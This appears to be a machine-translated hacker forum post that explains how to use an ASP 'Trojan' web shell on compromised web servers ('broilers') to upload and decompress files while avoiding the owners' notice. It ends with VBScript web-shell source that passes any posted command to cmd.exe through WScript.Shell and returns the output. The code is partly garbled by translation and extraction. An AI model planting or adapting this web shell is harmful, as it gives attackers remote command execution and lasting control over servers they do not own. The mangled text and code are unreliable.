Using ASP Trojan to realize FTP and decompression

I think we all have some 80-port chicken, if it is the security of the domestic do not look down, if you do not wish to look down, the younger brother shortcoming, in order to make a start.

The most troublesome thing on the broiler site is to update and upload a large number of files, Terminal Services are easily found in broad daylight, they open an FTP and do not trust. I turned around on the internet and found that by combining the component-free upload and ASP Trojan can be easily implemented.

ASP Trojan Everyone is very familiar with, nothing but a cmd, what role ah, you do not worry, listen to me slowly. The whole idea is to upload a component-free ASP program first through ftp,139, or WinShell. I chose Transformation's Webedit ( In fact, this is not a simple no component upload tool, through it can also modify, delete files/directories, can be used to update the page Oh, made up ads, I have no relatives with him ah, flashed a flying bottle. Continue) and an ASP Trojan horse (if, I'm too lazy to find it. Finally with the source code, paste Save as an ASP file can be, remember that can be in the broiler Web directory OH. In fact, most of the problems Webedit can be solved, but if there are many files one upload can be trouble, how to do? The ASP Trojan is used. Find a Rar.exe (all the directories that have been loaded winrar, maybe the broiler is OK, if the other command line decompression tool can also OH) put it to the%systemroot% System32. Upload A. zip or. rar file to the Broiler Web directory. In the browser address bar open ASP Trojan (temporarily called trojan.asp), in the text text box input rar-x source.rar Path decompression success, V, Wait a minute. How do I get the absolute path to the Web directory (path)? I'm using a soil method, modifying trojan.asp to join a line to convert a virtual directory into an absolute path and output statements <% =server.mappath (".")%>, "." Can be arbitrarily changed to any relative virtual directory.

Just provide a thought, if which cow can write an ASP decompression that's better, but? who would, I wouldn't, would you? As for how to hide the virtual directory, support Simplified Chinese display and so on is not the discussion of the list, the old saying, safety first, generally put a small forum or chat room on it, If you really put a personal homepage, also put their own contact address, the phone number is also left to others is not very good. Ps.junesun suggest directly to make a self-extracting, I do not know whether the pop-up dialog box.

--------The following is the source code of the ASP trojan, recommended after adding <% =server.mappath (".")%>------------------------------

<%@ language=vbscript%> 
<% 
Dim oscript 
Dim oscriptnet 
Dim ofilesys, ofile 
Dim Szcmd, Sztempfile

on Error Resume next 
"

"--Create the COM objects that we'll be Using-'  
Set oscript = Server.CreateObject (' WSCRIPT. SHELL ")  
Set oscriptnet = Server.CreateObject (" WSCRIPT. Network ")  
Set Ofilesys = Server.CreateObject (" Scripting.FileSystemObject ") [

'--Check for a command That we have posted-'  
Szcmd = Request.Form (". CMD ")  
If (szcmd <>" ") Then

'--Use a poor mans ' pipe ... a temp file--'  
Sztempfile = "C:" & Ofilesys.gettempname ()  
Call Oscript.run ("cmd.exe/c" & Szcmd & ">" & Sztempfile, 0, True)  
Set ofile = Ofilesys.opentextfile (sztempfile, 1, False, 0)

EnD If

%> 
 
 

" method = "POST" > 
&NBSP;
 

 "
 
 <%&NBSP 
 If (IsObject (ofile)) then  
 '--Read the output from our command and remove the temp file--'   ; 
 on Error Resume next  
 Response.Write Server.HTMLEncode (Ofile.readall)   
 ofile.close  
 
Call Ofilesys.deletefile (Sztempfile, True)   
 End if  
%>  
    
  
 >